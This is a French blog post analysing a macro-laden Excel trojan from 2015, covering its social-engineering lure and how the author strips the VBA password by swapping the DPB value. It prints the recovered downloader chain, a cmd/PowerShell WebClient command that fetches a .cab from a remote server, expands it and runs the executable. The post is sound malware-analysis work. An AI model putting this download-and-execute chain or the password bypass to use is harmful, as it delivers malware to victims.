Je me suis intéressé au document "IM1637_863.xls" détecté comme étant Trojan.MSExcel.Agent.e, créé depuis Microsoft Excel à 18:10:45 et modifié à 18:10:48, le 19 janvier 2015.
Par défaut, Microsoft Excel empêche l'exécution des macros.
La victime se doit d'abaisser le niveau de sécurité en autorisant l'exécution de macros inconnues.
Stupide me direz-vous ? Et pourtant, à la surprise générale, ça fonctionne encore !
L'année 2015 commence avec une ↗ significative des infections par documents piégés avec macros.
( graphique est extrait du rapport "TrendLabs 1Q 2015 Security Roundup" )
En novembre 2014, j'écrivais sur la campagne de pourriels ciblant le Royaume-Uni qui comportaient des documents Word piégés. Début 2015, Microsoft s'est empressé de communiquer sur le sujet en fournissant des conseils et des détails sur les méthodes d'ingénieries sociales employées sur les documents Word & Excel.
La consultation est autorisée, seule l'exécution est bloquée donc, l'esprit rassuré, les habitués à ces fichiers ont pris le réflexe d'aller inspecter le contenu des macros. Mais voilà, dans le cas qui nous intéresse l'accès au code est protégé par un mot de passe. Le but recherché n'est pas de ralentir l'analyse car les moteurs antivirus n'ont pas besoins de connaitre ce genre de détails et ce n'est pas non plus pour ralentir l'expert car celui-ci maitrise les manipulations de flux de documents OLE. Finalement, c'est lié aux principaux intéressés : de quoi susciter un doute et titiller la conscience des employés assignés aux travaux de secrétariat : "c'est peut-être un document important..." se disent-ils. Dilemme, dois-je autoriser pour vérifier ?
Pour visualiser le VBA, je remplace le mot de passe inconnu de la protection de l'affichage du projet. ( un classique, lire Rovnix infects systems with password-protected macros ) Pour se faire, j'édite le fichier à l'aide d'un éditeur hexadécimal puis je recherche et remplace la valeur de DPB.
DPB="AEAC020F0E31784E784E87B2794E863353E281979D8B37C6A87A1192FEDE92E279A16963A89D07"
Par un mot de passe de notre choix, que l'on connait.
DPB="4644EAD32ED54CF24CF2B30E4DF2676D8AAC3C472BAB27AC5830395FAF05FF1129A318DA79433F"
J'enregistre sous une copie. À la demande du mot de passe, je saisi le mot de passe "chenapan".
Dans le code, je remplace la commande "Shell" qui normalement exécute par une commande inoffensive permettant d'écrire dans la fenêtre d'affichage du débogueur ( vidéo ).
Voici le code affiché:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://...','%TEMP%\JIOiodfhioIH.cab');
expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;
start %TEMP%\JIOiodfhioIH.exe;
L'interpréteur de commandes "cmd.exe" va rester actif et exécuter la commande "PowerShell.exe" avec ses arguments. La commandelette "New-Object" de Windows PowerShell est utilisée pour créer et utiliser la méthode WebClient.DownloadFile pour récupérer un fichier sur le serveur distant : 176.31.28.235. L'utilitaire de décompression de fichiers compressés "expand.exe" va extraire le contenu du fichier téléchargé au format cabinet à l'emplacement des fichiers temporaires de Windows. La commande "start" va, comme son nom l'indique, exécuter le programme.
J'ignore si le cocktail ( Microsoft Excel + Microsoft Visual Basic for Applications + Microsoft PowerShell ) sera efficace mais chose certaine c'est que lorsque les "badguys" utiliseront pleinement la puissance et les capacités de WMI ⑴ ou PowerShell ⑵ ce sera surement une toute autre paire de manche.
edit: Ajouts de liens hypertextes vers nouvelles publications.
➱ ( 16 Feb 2015 ) ❴ Banking malware VAWTRAK now uses malicious macros, abuses Windows PowerShell ❵
➱ ( 20 Apr 2015 ) ❴ Without a Trace : Fileless Malware Spotted in the Wild ❵
➱ ( 24 Mar 2015 ) ❴Macro-based malware increases along with spam volume, now drops BARTALEX ❵
➱ ( 27 Apr 2015 ) ❴Enterprises hit by BARTALEX macro malware in recent spam outbreak ❵
➱ ( 28 Apr 2015 ) ❴ Social engineering tricks open the door to macro-malware attacks ❵
➱ ( 4 May 2015 ) ❴ Macro Malware: When Old Tricks Still Work, Part 1 ❵
➱ ( 7 May 2015 ) ❴ Macro Malware: When Old Tricks Still Work, Part 2 ❵
⑴ Abusing Windows Management Instrumentation WMI to build a persistent asynchronous & fileless backdoor
⑵ CARO 2015 - The Tao of .NET & Powershell Malware Analysis ( Roberto Martinez // @r0bertmart1nez )
backlinks: Rançongiciels chiffreurs entièrement écrits en Windows PowerShell
